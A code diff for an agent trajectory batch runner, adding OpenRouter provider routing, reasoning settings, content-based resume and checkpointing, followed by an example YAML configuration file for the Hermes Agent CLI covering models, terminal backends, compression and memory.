print(f"✅ Batch {batch_num}: Completed ({len(prompts_to_process)} prompts processed)")
@@ -302,6 +502,8 @@ def _process_batch_worker(args: Tuple) -> Dict[str, Any]:
"processed": len(prompts_to_process),
"skipped": len(batch_data) - len(prompts_to_process),
"tool_stats": batch_tool_stats,
"reasoning_stats": batch_reasoning_stats,
"discarded_no_reasoning": discarded_no_reasoning,
"completed_prompts": completed_in_batch
}
@@ -325,6 +527,14 @@ class BatchRunner:
verbose: bool = False,
ephemeral_system_prompt: str = None,
log_prefix_chars: int = 100,
providers_allowed: List[str] = None,
providers_ignored: List[str] = None,
providers_order: List[str] = None,
provider_sort: str = None,
max_tokens: int = None,
reasoning_config: Dict[str, Any] = None,
prefill_messages: List[Dict[str, Any]] = None,
max_samples: int = None,
):
"""
Initialize the batch runner.
@@ -342,6 +552,14 @@ class BatchRunner:
verbose (bool): Enable verbose logging
ephemeral_system_prompt (str): System prompt used during agent execution but NOT saved to trajectories (optional)
log_prefix_chars (int): Number of characters to show in log previews for tool calls/responses (default: 100)
providers_allowed (List[str]): OpenRouter providers to allow (optional)
providers_ignored (List[str]): OpenRouter providers to ignore (optional)
providers_order (List[str]): OpenRouter providers to try in order (optional)
provider_sort (str): Sort providers by price/throughput/latency (optional)
max_tokens (int): Maximum tokens for model responses (optional, uses model default if not set)
reasoning_config (Dict): OpenRouter reasoning config override (e.g. {"effort": "none"} to disable thinking)
prefill_messages (List[Dict]): Messages to prepend as prefilled conversation context (few-shot priming)
max_samples (int): Only process the first N samples from the dataset (optional, processes all if not set)
"""
self.dataset_file = Path(dataset_file)
self.batch_size = batch_size
@@ -355,6 +573,14 @@ class BatchRunner:
self.verbose = verbose
self.ephemeral_system_prompt = ephemeral_system_prompt
self.log_prefix_chars = log_prefix_chars
self.providers_allowed = providers_allowed
self.providers_ignored = providers_ignored
self.providers_order = providers_order
self.provider_sort = provider_sort
self.max_tokens = max_tokens
self.reasoning_config = reasoning_config
self.prefill_messages = prefill_messages
self.max_samples = max_samples
# Validate distribution
if not validate_distribution(distribution):
@@ -370,13 +596,17 @@ class BatchRunner:
# Statistics file
self.stats_file = self.output_dir / "statistics.json"
# Load dataset
# Load dataset (and optionally truncate to max_samples)
self.dataset = self._load_dataset()
if self.max_samples and self.max_samples < len(self.dataset):
full_count = len(self.dataset)
self.dataset = self.dataset[:self.max_samples]
print(f"✂️ Truncated dataset from {full_count} to {self.max_samples} samples (--max_samples)")
# Create batches
self.batches = self._create_batches()
print(f"📊 Batch Runner Initialized")
print("📊 Batch Runner Initialized")
print(f" Dataset: {self.dataset_file} ({len(self.dataset)} prompts)")
print(f" Batch size: {self.batch_size}")
print(f" Total batches: {len(self.batches)}")
@@ -470,15 +700,91 @@ class BatchRunner:
lock (Lock): Optional lock for thread-safe access
"""
checkpoint_data["last_updated"] = datetime.now().isoformat()
from utils import atomic_json_write
if lock:
with lock:
with open(self.checkpoint_file, 'w', encoding='utf-8') as f:
json.dump(checkpoint_data, f, indent=2, ensure_ascii=False)
atomic_json_write(self.checkpoint_file, checkpoint_data)
else:
with open(self.checkpoint_file, 'w', encoding='utf-8') as f:
json.dump(checkpoint_data, f, indent=2, ensure_ascii=False)
atomic_json_write(self.checkpoint_file, checkpoint_data)
def _scan_completed_prompts_by_content(self) -> set:
"""
Scan all batch files and extract completed prompts by their actual content.
This provides a more robust resume mechanism that matches on prompt text
rather than indices, allowing recovery even if indices don't match.
Returns:
set: Set of prompt texts that have been successfully processed
"""
completed_prompts = set()
batch_files = sorted(self.output_dir.glob("batch_*.jsonl"))
if not batch_files:
return completed_prompts
print(f"📂 Scanning {len(batch_files)} batch files for completed prompts...")
for batch_file in batch_files:
try:
with open(batch_file, 'r', encoding='utf-8') as f:
for line in f:
try:
entry = json.loads(line.strip())
# Skip failed entries - we want to retry these
if entry.get("failed", False):
continue
# Extract the human/user prompt from conversations
conversations = entry.get("conversations", [])
for msg in conversations:
if msg.get("from") == "human":
prompt_text = msg.get("value", "").strip()
if prompt_text:
completed_prompts.add(prompt_text)
break # Only need the first human message
except json.JSONDecodeError:
continue
except Exception as e:
print(f" ⚠️ Warning: Error reading {batch_file.name}: {e}")
return completed_prompts
def _filter_dataset_by_completed(self, completed_prompts: set) -> Tuple[List[Dict], List[int]]:
"""
Filter the dataset to exclude prompts that have already been completed.
Args:
completed_prompts: Set of prompt texts that have been completed
Returns:
Tuple of (filtered_dataset, skipped_indices)
"""
filtered_dataset = []
skipped_indices = []
for idx, entry in enumerate(self.dataset):
# Extract prompt from the dataset entry
prompt_text = entry.get("prompt", "").strip()
# Also check conversations format
if not prompt_text:
conversations = entry.get("conversations", [])
for msg in conversations:
role = msg.get("role") or msg.get("from")
if role in ("user", "human"):
prompt_text = (msg.get("content") or msg.get("value", "")).strip()
break
if prompt_text in completed_prompts:
skipped_indices.append(idx)
else:
# Keep original index for tracking
filtered_dataset.append((idx, entry))
return filtered_dataset, skipped_indices
def run(self, resume: bool = False):
"""
@@ -491,16 +797,49 @@ class BatchRunner:
print("🚀 Starting Batch Processing")
print("=" * 70)
# Load checkpoint
checkpoint_data = self._load_checkpoint() if resume else {
"run_name": self.run_name,
"completed_prompts": [],
"batch_stats": {},
"last_updated": None
}
# Smart resume: scan batch files by content to find completed prompts
completed_prompt_texts = set()
if resume:
completed_prompt_texts = self._scan_completed_prompts_by_content()
if completed_prompt_texts:
print(f" Found {len(completed_prompt_texts)} already-completed prompts by content matching")
if resume and checkpoint_data.get("completed_prompts"):
print(f"📂 Resuming from checkpoint ({len(checkpoint_data['completed_prompts'])} prompts already completed)")
# Filter dataset to only include unprocessed prompts
if resume and completed_prompt_texts:
filtered_entries, skipped_indices = self._filter_dataset_by_completed(completed_prompt_texts)
if not filtered_entries:
print("\n✅ All prompts have already been processed!")
return
# Recreate batches from filtered entries (keeping original indices for tracking)
batches_to_process = []
for i in range(0, len(filtered_entries), self.batch_size):
batch = filtered_entries[i:i + self.batch_size]
batches_to_process.append(batch)
self.batches = batches_to_process
# Print prominent resume summary
print("\n" + "=" * 70)
print("📊 RESUME SUMMARY")
print("=" * 70)
print(f" Original dataset size: {len(self.dataset):,} prompts")
print(f" Already completed: {len(skipped_indices):,} prompts")
print(" ─────────────────────────────────────────")
print(f" 🎯 RESUMING WITH: {len(filtered_entries):,} prompts")
print(f" New batches created: {len(batches_to_process)}")
print("=" * 70 + "\n")
# Load existing checkpoint (so resume doesn't clobber prior progress)
checkpoint_data = self._load_checkpoint()
if checkpoint_data.get("run_name") != self.run_name:
checkpoint_data = {
"run_name": self.run_name,
"completed_prompts": [],
"batch_stats": {},
"last_updated": None
}
# Prepare configuration for workers
config = {
@@ -511,10 +850,17 @@ class BatchRunner:
"api_key": self.api_key,
"verbose": self.verbose,
"ephemeral_system_prompt": self.ephemeral_system_prompt,
"log_prefix_chars": self.log_prefix_chars
"log_prefix_chars": self.log_prefix_chars,
"providers_allowed": self.providers_allowed,
"providers_ignored": self.providers_ignored,
"providers_order": self.providers_order,
"provider_sort": self.provider_sort,
"max_tokens": self.max_tokens,
"reasoning_config": self.reasoning_config,
"prefill_messages": self.prefill_messages,
}
# Get completed prompts set
# For backward compatibility, still track by index (but this is secondary to content matching)
completed_prompts_set = set(checkpoint_data.get("completed_prompts", []))
# Aggregate statistics across all batches
@@ -522,6 +868,11 @@ class BatchRunner:
start_time = time.time()
print(f"\n🔧 Initializing {self.num_workers} worker processes...")
# Checkpoint writes happen in the parent process; keep a lock for safety.
checkpoint_lock = Lock()
# Process batches in parallel
with Pool(processes=self.num_workers) as pool:
# Create tasks for each batch
@@ -536,11 +887,66 @@ class BatchRunner:
for batch_num, batch_data in enumerate(self.batches)
]
# Use map to process batches in parallel
results = pool.map(_process_batch_worker, tasks)
print(f"✅ Created {len(tasks)} batch tasks")
print("🚀 Starting parallel batch processing...\n")
# Use rich Progress for better visual tracking with persistent bottom bar
# redirect_stdout/stderr stay False here so prints from worker processes pass through directly
results = []
console = Console(force_terminal=True)
with Progress(
SpinnerColumn(),
TextColumn("[bold blue]📦 Batches"),
BarColumn(bar_width=40),
MofNCompleteColumn(),
TextColumn(""),
TimeRemainingColumn(),
console=console,
refresh_per_second=2,
transient=False,
redirect_stdout=False,
redirect_stderr=False,
) as progress:
task = progress.add_task("Processing", total=len(tasks))
# Temporarily raise the root log level to WARNING so INFO/DEBUG lines don't break the bar
root_logger = logging.getLogger()
original_level = root_logger.level
root_logger.setLevel(logging.WARNING)
try:
for result in pool.imap_unordered(_process_batch_worker, tasks):
results.append(result)
progress.update(task, advance=1)
# Incremental checkpoint update (so resume works after crash)
try:
batch_num = result.get('batch_num')
completed = result.get('completed_prompts', []) or []
completed_prompts_set.update(completed)
if isinstance(batch_num, int):
checkpoint_data.setdefault('batch_stats', {})[str(batch_num)] = {
'processed': result.get('processed', 0),
'skipped': result.get('skipped', 0),
'discarded_no_reasoning': result.get('discarded_no_reasoning', 0),
}
checkpoint_data['completed_prompts'] = sorted(completed_prompts_set)
self._save_checkpoint(checkpoint_data, lock=checkpoint_lock)
except Exception as ckpt_err:
# Don't fail the run if checkpoint write fails
print(f"⚠️ Warning: Failed to save incremental checkpoint: {ckpt_err}")
except Exception as e:
logger.error("Batch worker failed: %s", e, exc_info=True)
raise
finally:
root_logger.setLevel(original_level)
# Aggregate all batch statistics and update checkpoint
all_completed_prompts = list(completed_prompts_set)
total_reasoning_stats = {"total_assistant_turns": 0, "turns_with_reasoning": 0, "turns_without_reasoning": 0}
for batch_result in results:
# Add newly completed prompts
all_completed_prompts.extend(batch_result.get("completed_prompts", []))
@@ -557,10 +963,17 @@ class BatchRunner:
total_tool_stats[tool_name]["count"] += stats["count"]
total_tool_stats[tool_name]["success"] += stats["success"]
total_tool_stats[tool_name]["failure"] += stats["failure"]
# Aggregate reasoning stats
for key in total_reasoning_stats:
total_reasoning_stats[key] += batch_result.get("reasoning_stats", {}).get(key, 0)
# Save final checkpoint
checkpoint_data["completed_prompts"] = all_completed_prompts
self._save_checkpoint(checkpoint_data)
# Save final checkpoint (best-effort; incremental writes already happened)
try:
checkpoint_data["completed_prompts"] = all_completed_prompts
self._save_checkpoint(checkpoint_data, lock=checkpoint_lock)
except Exception as ckpt_err:
print(f"⚠️ Warning: Failed to save final checkpoint: {ckpt_err}")
# Calculate success rates
for tool_name in total_tool_stats:
@@ -573,19 +986,51 @@ class BatchRunner:
stats["success_rate"] = 0.0
stats["failure_rate"] = 0.0
# Combine all batch files into a single trajectories.jsonl file
# Combine ALL batch files in directory into a single trajectories.jsonl file
# This includes both old batches (from previous runs) and new batches (from resume)
# Also filter out corrupted entries (where model generated invalid tool names)
combined_file = self.output_dir / "trajectories.jsonl"
print(f"\n📦 Combining batch files into {combined_file.name}...")
print(f"\n📦 Combining ALL batch files into {combined_file.name}...")
# Valid tools auto-derived from model_tools.py — no manual updates needed
VALID_TOOLS = ALL_POSSIBLE_TOOLS
total_entries = 0
filtered_entries = 0
batch_files_found = 0
# Find ALL batch files in the output directory (handles resume merging old + new)
all_batch_files = sorted(self.output_dir.glob("batch_*.jsonl"))
with open(combined_file, 'w', encoding='utf-8') as outfile:
for batch_num in range(len(self.batches)):
batch_file = self.output_dir / f"batch_{batch_num}.jsonl"
if batch_file.exists():
with open(batch_file, 'r', encoding='utf-8') as infile:
for line in infile:
for batch_file in all_batch_files:
batch_files_found += 1
batch_num = batch_file.stem.split("_")[1] # Extract batch number for logging
with open(batch_file, 'r', encoding='utf-8') as infile:
for line in infile:
total_entries += 1
try:
data = json.loads(line)
tool_stats = data.get('tool_stats', {})
# Check for invalid tool names (model hallucinations)
invalid_tools = [k for k in tool_stats.keys() if k not in VALID_TOOLS]
if invalid_tools:
filtered_entries += 1
invalid_preview = invalid_tools[0][:50] + "..." if len(invalid_tools[0]) > 50 else invalid_tools[0]
print(f" ⚠️ Filtering corrupted entry (batch {batch_num}): invalid tool '{invalid_preview}'")
continue
outfile.write(line)
except json.JSONDecodeError:
filtered_entries += 1
print(f" ⚠️ Filtering invalid JSON entry (batch {batch_num})")
print(f"✅ Combined {len(self.batches)} batch files into trajectories.jsonl")
if filtered_entries > 0:
print(f"⚠️ Filtered {filtered_entries} corrupted entries out of {total_entries} total")
print(f"✅ Combined {batch_files_found} batch files into trajectories.jsonl ({total_entries - filtered_entries} entries)")
# Save final statistics
final_stats = {
@@ -597,7 +1042,8 @@ class BatchRunner:
"model": self.model,
"completed_at": datetime.now().isoformat(),
"duration_seconds": round(time.time() - start_time, 2),
"tool_statistics": total_tool_stats
"tool_statistics": total_tool_stats,
"reasoning_statistics": total_reasoning_stats,
}
with open(self.stats_file, 'w', encoding='utf-8') as f:
@@ -607,10 +1053,11 @@ class BatchRunner:
print("\n" + "=" * 70)
print("📊 BATCH PROCESSING COMPLETE")
print("=" * 70)
print(f"Total prompts processed: {len(self.dataset)}")
print(f"✅ Total batches: {len(self.batches)}")
print(f"Prompts processed this run: {sum(r.get('processed', 0) for r in results)}")
print(f"✅ Total trajectories in merged file: {total_entries - filtered_entries}")
print(f"✅ Total batch files merged: {batch_files_found}")
print(f"⏱️ Total duration: {round(time.time() - start_time, 2)}s")
print(f"\n📈 Tool Usage Statistics:")
print("\n📈 Tool Usage Statistics:")
print("-" * 70)
if total_tool_stats:
@@ -634,9 +1081,28 @@ class BatchRunner:
else:
print("No tool calls were made during this run.")
# Print reasoning coverage stats
total_discarded = sum(r.get("discarded_no_reasoning", 0) for r in results)
print("\n🧠 Reasoning Coverage:")
print("-" * 70)
total_turns = total_reasoning_stats["total_assistant_turns"]
with_reasoning = total_reasoning_stats["turns_with_reasoning"]
without_reasoning = total_reasoning_stats["turns_without_reasoning"]
if total_turns > 0:
pct_with = round(with_reasoning / total_turns * 100, 1)
pct_without = round(without_reasoning / total_turns * 100, 1)
print(f" Total assistant turns: {total_turns:,}")
print(f" With reasoning: {with_reasoning:,} ({pct_with}%)")
print(f" Without reasoning: {without_reasoning:,} ({pct_without}%)")
else:
print(" No assistant turns recorded.")
if total_discarded > 0:
print(f" 🚫 Samples discarded (zero reasoning): {total_discarded:,}")
print(f"\n💾 Results saved to: {self.output_dir}")
print(f" - Trajectories: trajectories.jsonl (combined)")
print(f" - Individual batches: batch_*.jsonl (for debugging)")
print(" - Trajectories: trajectories.jsonl (combined)")
print(" - Individual batches: batch_*.jsonl (for debugging)")
print(f" - Statistics: {self.stats_file.name}")
print(f" - Checkpoint: {self.checkpoint_file.name}")
@@ -646,9 +1112,9 @@ def main(
batch_size: int = None,
run_name: str = None,
distribution: str = "default",
model: str = "claude-opus-4-20250514",
model: str = "anthropic/claude-sonnet-4.6",
api_key: str = None,
base_url: str = "https://api.anthropic.com/v1/",
base_url: str = "https://openrouter.ai/api/v1",
max_turns: int = 10,
num_workers: int = 4,
resume: bool = False,
@@ -656,6 +1122,15 @@ def main(
list_distributions: bool = False,
ephemeral_system_prompt: str = None,
log_prefix_chars: int = 100,
providers_allowed: str = None,
providers_ignored: str = None,
providers_order: str = None,
provider_sort: str = None,
max_tokens: int = None,
reasoning_effort: str = None,
reasoning_disabled: bool = False,
prefill_messages_file: str = None,
max_samples: int = None,
):
"""
Run batch processing of agent prompts from a dataset.
@@ -675,6 +1150,15 @@ def main(
list_distributions (bool): List available toolset distributions and exit
ephemeral_system_prompt (str): System prompt used during agent execution but NOT saved to trajectories (optional)
log_prefix_chars (int): Number of characters to show in log previews for tool calls/responses (default: 100)
providers_allowed (str): Comma-separated list of OpenRouter providers to allow (e.g. "anthropic,openai")
providers_ignored (str): Comma-separated list of OpenRouter providers to ignore (e.g. "together,deepinfra")
providers_order (str): Comma-separated list of OpenRouter providers to try in order (e.g. "anthropic,openai,google")
provider_sort (str): Sort providers by "price", "throughput", or "latency" (OpenRouter only)
max_tokens (int): Maximum tokens for model responses (optional, uses model default if not set)
reasoning_effort (str): OpenRouter reasoning effort level: "xhigh", "high", "medium", "low", "minimal", "none" (default: "medium")
reasoning_disabled (bool): Completely disable reasoning/thinking tokens (default: False)
prefill_messages_file (str): Path to JSON file containing prefill messages (list of {role, content} dicts)
max_samples (int): Only process the first N samples from the dataset (optional, processes all if not set)
Examples:
# Basic usage
@@ -686,9 +1170,13 @@ def main(
# Use specific distribution
python batch_runner.py --dataset_file=data.jsonl --batch_size=10 --run_name=image_test --distribution=image_gen
# With ephemeral system prompt (not saved to dataset)
# With disabled reasoning and max tokens
python batch_runner.py --dataset_file=data.jsonl --batch_size=10 --run_name=my_run \\
--ephemeral_system_prompt="You are a helpful assistant focused on image generation."
--reasoning_disabled --max_tokens=128000
# With prefill messages from file
python batch_runner.py --dataset_file=data.jsonl --batch_size=10 --run_name=my_run \\
--prefill_messages_file=configs/prefill_opus.json
# List available distributions
python batch_runner.py --list_distributions
@@ -722,6 +1210,41 @@ def main(
print("❌ Error: --run_name is required")
return
# Parse provider preferences (comma-separated strings to lists)
providers_allowed_list = [p.strip() for p in providers_allowed.split(",")] if providers_allowed else None
providers_ignored_list = [p.strip() for p in providers_ignored.split(",")] if providers_ignored else None
providers_order_list = [p.strip() for p in providers_order.split(",")] if providers_order else None
# Build reasoning_config from CLI flags
# --reasoning_disabled takes priority, then --reasoning_effort, then default (medium)
reasoning_config = None
if reasoning_disabled:
# Completely disable reasoning/thinking tokens
reasoning_config = {"effort": "none"}
print("🧠 Reasoning: DISABLED (effort=none)")
elif reasoning_effort:
# Use specified effort level
valid_efforts = ["xhigh", "high", "medium", "low", "minimal", "none"]
if reasoning_effort not in valid_efforts:
print(f"❌ Error: --reasoning_effort must be one of: {', '.join(valid_efforts)}")
return
reasoning_config = {"enabled": True, "effort": reasoning_effort}
print(f"🧠 Reasoning effort: {reasoning_effort}")
# Load prefill messages from JSON file if provided
prefill_messages = None
if prefill_messages_file:
try:
with open(prefill_messages_file, 'r', encoding='utf-8') as f:
prefill_messages = json.load(f)
if not isinstance(prefill_messages, list):
print("❌ Error: prefill_messages_file must contain a JSON array of messages")
return
print(f"💬 Loaded {len(prefill_messages)} prefill messages from {prefill_messages_file}")
except Exception as e:
print(f"❌ Error loading prefill messages: {e}")
return
# Initialize and run batch runner
try:
runner = BatchRunner(
@@ -736,7 +1259,15 @@ def main(
num_workers=num_workers,
verbose=verbose,
ephemeral_system_prompt=ephemeral_system_prompt,
log_prefix_chars=log_prefix_chars
log_prefix_chars=log_prefix_chars,
providers_allowed=providers_allowed_list,
providers_ignored=providers_ignored_list,
providers_order=providers_order_list,
provider_sort=provider_sort,
max_tokens=max_tokens,
reasoning_config=reasoning_config,
prefill_messages=prefill_messages,
max_samples=max_samples,
)
runner.run(resume=resume)
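A minimal sketch of a dataset that exercises the per-prompt container image override added above (the file name, prompts, and image tag are hypothetical; "prompt", "image", and "cwd" are the row keys _process_single_prompt reads):

import json

rows = [
    {"prompt": "Run the test suite and fix any failures.",
     "image": "python:3.11-slim", "cwd": "/workspace"},
    {"prompt": "Summarize README.md."},  # no image -> default sandbox image
]
with open("data.jsonl", "w", encoding="utf-8") as f:
    for row in rows:
        f.write(json.dumps(row) + "\n")

# Then, for example:
#   python batch_runner.py --dataset_file=data.jsonl --batch_size=2 --run_name=img_demo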

722
cli-config.yaml.example Normal file

@@ -0,0 +1,722 @@
# Hermes Agent CLI Configuration
# Copy this file to cli-config.yaml and customize as needed.
# This file configures the CLI behavior. Environment variables in .env take precedence.
# =============================================================================
# Model Configuration
# =============================================================================
model:
# Default model to use (can be overridden with --model flag)
default: "anthropic/claude-opus-4.6"
# Inference provider selection:
# "auto" - Use Nous Portal if logged in, otherwise OpenRouter/env vars (default)
# "nous-api" - Use Nous Portal via API key (requires: NOUS_API_KEY)
# "openrouter" - Always use OpenRouter API key from OPENROUTER_API_KEY
# "nous" - Always use Nous Portal (requires: hermes login)
# "zai" - Use z.ai / ZhipuAI GLM models (requires: GLM_API_KEY)
# "kimi-coding"- Use Kimi / Moonshot AI models (requires: KIMI_API_KEY)
# "minimax" - Use MiniMax global endpoint (requires: MINIMAX_API_KEY)
# "minimax-cn" - Use MiniMax China endpoint (requires: MINIMAX_CN_API_KEY)
# Can also be overridden with --provider flag or HERMES_INFERENCE_PROVIDER env var.
provider: "auto"
# API configuration (falls back to OPENROUTER_API_KEY env var)
# api_key: "your-key-here" # Uncomment to set here instead of .env
base_url: "https://openrouter.ai/api/v1"
# =============================================================================
# OpenRouter Provider Routing (only applies when using OpenRouter)
# =============================================================================
# Control how requests are routed across providers on OpenRouter.
# See: https://openrouter.ai/docs/guides/routing/provider-selection
#
# provider_routing:
# # Sort strategy: "price" (default), "throughput", or "latency"
# # Append :nitro to model name for a shortcut to throughput sorting.
# sort: "throughput"
#
# # Only allow these providers (provider slugs from OpenRouter)
# # only: ["anthropic", "google"]
#
# # Skip these providers entirely
# # ignore: ["deepinfra", "fireworks"]
#
# # Try providers in this order (overrides default load balancing)
# # order: ["anthropic", "google", "together"]
#
# # Require providers to support all parameters in your request
# # require_parameters: true
#
# # Data policy: "allow" (default) or "deny" to exclude providers that may store data
# # data_collection: "deny"
# =============================================================================
# Git Worktree Isolation
# =============================================================================
# When enabled, each CLI session creates an isolated git worktree so multiple
# agents can work on the same repo concurrently without file collisions.
# Equivalent to always passing --worktree / -w on the command line.
#
# worktree: true # Always create a worktree when in a git repo
# worktree: false # Default — only create when -w flag is passed
# =============================================================================
# Terminal Tool Configuration
# =============================================================================
# Choose ONE of the following terminal configurations by uncommenting it.
# The terminal tool executes commands in the specified environment.
# -----------------------------------------------------------------------------
# OPTION 1: Local execution (default)
# Commands run directly on your machine in the current directory
# -----------------------------------------------------------------------------
# Working directory behavior:
# - CLI (`hermes` command): Uses "." (current directory where you run hermes)
# - Messaging (Telegram/Discord): Uses MESSAGING_CWD from .env (default: home)
terminal:
backend: "local"
cwd: "." # For local backend: "." = current directory. Ignored for remote backends.
timeout: 180
lifetime_seconds: 300
# sudo_password: "" # Enable sudo commands (pipes via sudo -S) - SECURITY WARNING: plaintext!
# -----------------------------------------------------------------------------
# OPTION 2: SSH remote execution
# Commands run on a remote server - agent code stays local (sandboxed)
# Great for: keeping agent isolated from its own code, using powerful remote hardware
# -----------------------------------------------------------------------------
# terminal:
# backend: "ssh"
# cwd: "/home/myuser/project" # Path on the REMOTE server
# timeout: 180
# lifetime_seconds: 300
# ssh_host: "my-server.example.com"
# ssh_user: "myuser"
# ssh_port: 22
# ssh_key: "~/.ssh/id_rsa" # Optional - uses ssh-agent if not specified
# -----------------------------------------------------------------------------
# OPTION 3: Docker container
# Commands run in an isolated Docker container
# Great for: reproducible environments, testing, isolation
# -----------------------------------------------------------------------------
# terminal:
# backend: "docker"
# cwd: "/workspace" # Path INSIDE the container (default: /)
# timeout: 180
# lifetime_seconds: 300
# docker_image: "nikolaik/python-nodejs:python3.11-nodejs20"
# -----------------------------------------------------------------------------
# OPTION 4: Singularity/Apptainer container
# Commands run in a Singularity container (common in HPC environments)
# Great for: HPC clusters, shared compute environments
# -----------------------------------------------------------------------------
# terminal:
# backend: "singularity"
# cwd: "/workspace" # Path INSIDE the container (default: /root)
# timeout: 180
# lifetime_seconds: 300
# singularity_image: "docker://nikolaik/python-nodejs:python3.11-nodejs20"
# -----------------------------------------------------------------------------
# OPTION 5: Modal cloud execution
# Commands run on Modal's cloud infrastructure
# Great for: GPU access, scalable compute, serverless execution
# -----------------------------------------------------------------------------
# terminal:
# backend: "modal"
# cwd: "/workspace" # Path INSIDE the sandbox (default: /root)
# timeout: 180
# lifetime_seconds: 300
# modal_image: "nikolaik/python-nodejs:python3.11-nodejs20"
# -----------------------------------------------------------------------------
# OPTION 6: Daytona cloud execution
# Commands run in Daytona cloud sandboxes
# Great for: Cloud dev environments, persistent workspaces, team collaboration
# Requires: pip install daytona, DAYTONA_API_KEY env var
# -----------------------------------------------------------------------------
# terminal:
# backend: "daytona"
# cwd: "~"
# timeout: 180
# lifetime_seconds: 300
# daytona_image: "nikolaik/python-nodejs:python3.11-nodejs20"
# container_disk: 10240 # Daytona max is 10GB per sandbox
#
# --- Container resource limits (docker, singularity, modal, daytona -- ignored for local/ssh) ---
# These settings apply to all container backends. They control the resources
# allocated to the sandbox and whether its filesystem persists across sessions.
container_cpu: 1 # CPU cores
container_memory: 5120 # Memory in MB (5120 = 5GB)
container_disk: 51200 # Disk in MB (51200 = 50GB)
container_persistent: true # Persist filesystem across sessions (false = ephemeral)
# -----------------------------------------------------------------------------
# SUDO SUPPORT (works with ALL backends above)
# -----------------------------------------------------------------------------
# Add sudo_password to any terminal config above to enable sudo commands.
# The password is piped via `sudo -S`. Works with local, ssh, docker, etc.
#
# SECURITY WARNING: Password stored in plaintext!
#
# INTERACTIVE PROMPT: If no sudo_password is set and the CLI is running,
# you'll be prompted to enter your password when sudo is needed:
# - 45-second timeout (auto-skips if no input)
# - Press Enter to skip (command fails gracefully)
# - Password is hidden while typing
# - Password is cached for the session
#
# ALTERNATIVES:
# - SSH backend: Configure passwordless sudo on the remote server
# - Containers: Run as root inside the container (no sudo needed)
# - Local: Configure /etc/sudoers for specific commands
#
# Example (add to your terminal section):
# sudo_password: "your-password-here"
# =============================================================================
# Browser Tool Configuration
# =============================================================================
browser:
# Inactivity timeout in seconds - browser sessions are automatically closed
# after this period of no activity between agent loops (default: 120 = 2 minutes)
inactivity_timeout: 120
# =============================================================================
# Context Compression (Auto-shrinks long conversations)
# =============================================================================
# When conversation approaches model's context limit, middle turns are
# automatically summarized to free up space while preserving important context.
#
# HOW IT WORKS:
# 1. Tracks actual token usage from API responses (not estimates)
# 2. When prompt_tokens >= threshold% of model's context_length, triggers compression
# 3. Protects first 3 turns (system prompt, initial request, first response)
# 4. Protects last 4 turns (recent context is most relevant)
# 5. Summarizes middle turns using a fast/cheap model
# 6. Inserts summary as a user message, continues conversation seamlessly
#
compression:
# Enable automatic context compression (default: true)
# Set to false if you prefer to manage context manually or want errors on overflow
enabled: true
# Trigger compression at this % of model's context limit (default: 0.85 = 85%)
# Lower values = more aggressive compression, higher values = compress later
threshold: 0.85
# Model to use for generating summaries (fast/cheap recommended)
# This model compresses the middle turns into a concise summary.
# IMPORTANT: it receives the full middle section of the conversation, so it
# MUST support a context length at least as large as your main model's.
summary_model: "google/gemini-3-flash-preview"
# Provider for the summary model (default: "auto")
# Options: "auto", "openrouter", "nous", "main"
# summary_provider: "auto"
# =============================================================================
# Auxiliary Models (Advanced — Experimental)
# =============================================================================
# Hermes uses lightweight "auxiliary" models for side tasks: image analysis,
# browser screenshot analysis, web page summarization, and context compression.
#
# By default these use Gemini Flash via OpenRouter or Nous Portal and are
# auto-detected from your credentials. You do NOT need to change anything
# here for normal usage.
#
# WARNING: Overriding these with providers other than OpenRouter or Nous Portal
# is EXPERIMENTAL and may not work. Not all models/providers support vision,
# produce usable summaries, or accept the same API format. Change at your own
# risk — if things break, reset to "auto" / empty values.
#
# Each task has its own provider + model pair so you can mix providers.
# For example: OpenRouter for vision (needs multimodal), but your main
# local endpoint for compression (just needs text).
#
# Provider options:
# "auto" - Best available: OpenRouter → Nous Portal → main endpoint (default)
# "openrouter" - Force OpenRouter (requires OPENROUTER_API_KEY)
# "nous" - Force Nous Portal (requires: hermes login)
# "codex" - Force Codex OAuth (requires: hermes model → Codex).
# Uses gpt-5.3-codex which supports vision.
# "main" - Use your custom endpoint (OPENAI_BASE_URL + OPENAI_API_KEY).
# Works with OpenAI API, local models, or any OpenAI-compatible
# endpoint. Also falls back to Codex OAuth and API-key providers.
#
# Model: leave empty to use the provider's default. When empty, OpenRouter
# uses "google/gemini-3-flash-preview" and Nous uses "gemini-3-flash".
# Other providers pick a sensible default automatically.
#
# auxiliary:
# # Image analysis: vision_analyze tool + browser screenshots
# vision:
# provider: "auto"
# model: "" # e.g. "google/gemini-2.5-flash", "openai/gpt-4o"
#
# # Web page scraping / summarization + browser page text extraction
# web_extract:
# provider: "auto"
# model: ""
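#
# # Mixed-provider sketch (hypothetical values; adjust to your credentials):
# # keep vision on OpenRouter for multimodal support, but run text-only
# # web extraction on your local endpoint:
# auxiliary:
#   vision:
#     provider: "openrouter"
#     model: "google/gemini-2.5-flash"
#   web_extract:
#     provider: "main"
#     model: ""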
# =============================================================================
# Persistent Memory
# =============================================================================
# Bounded curated memory injected into the system prompt every session.
# Two stores: MEMORY.md (agent's notes) and USER.md (user profile).
# Character limits keep the memory small and focused. The agent manages
# pruning -- when at the limit, it must consolidate or replace entries.
# Disabled by default in batch_runner and RL environments.
#
memory:
# Agent's personal notes: environment facts, conventions, things learned
memory_enabled: true
# User profile: preferences, communication style, expectations
user_profile_enabled: true
# Character limits (~2.75 chars per token, model-independent)
memory_char_limit: 2200 # ~800 tokens
user_char_limit: 1375 # ~500 tokens
# Periodic memory nudge: remind the agent to consider saving memories
# every N user turns. Set to 0 to disable. Only active when memory is enabled.
nudge_interval: 10 # Nudge every 10 user turns (0 = disabled)
# Memory flush: give the agent one turn to save memories before context is
# lost (compression, /new, /reset, exit). Set to 0 to disable.
# For exit/reset, only fires if the session had at least this many user turns.
flush_min_turns: 6 # Min user turns to trigger flush on exit/reset (0 = disabled)
# =============================================================================
# Session Reset Policy (Messaging Platforms)
# =============================================================================
# Controls when messaging sessions (Telegram, Discord, WhatsApp, Slack) are
# automatically cleared. Without resets, conversation context grows indefinitely
# which increases API costs with every message.
#
# When a reset triggers, the agent first gets one turn to save important
# memories and skills to its persistent memory; then the conversation context
# is wiped. The agent starts fresh but retains learned facts across sessions.
#
# Users can always manually reset with /reset or /new in chat.
#
# Modes:
# "both" - Reset on EITHER inactivity timeout or daily boundary (recommended)
# "idle" - Reset only after N minutes of inactivity
# "daily" - Reset only at a fixed hour each day
# "none" - Never auto-reset; context lives until /reset or compression kicks in
#
session_reset:
mode: both # "both", "idle", "daily", or "none"
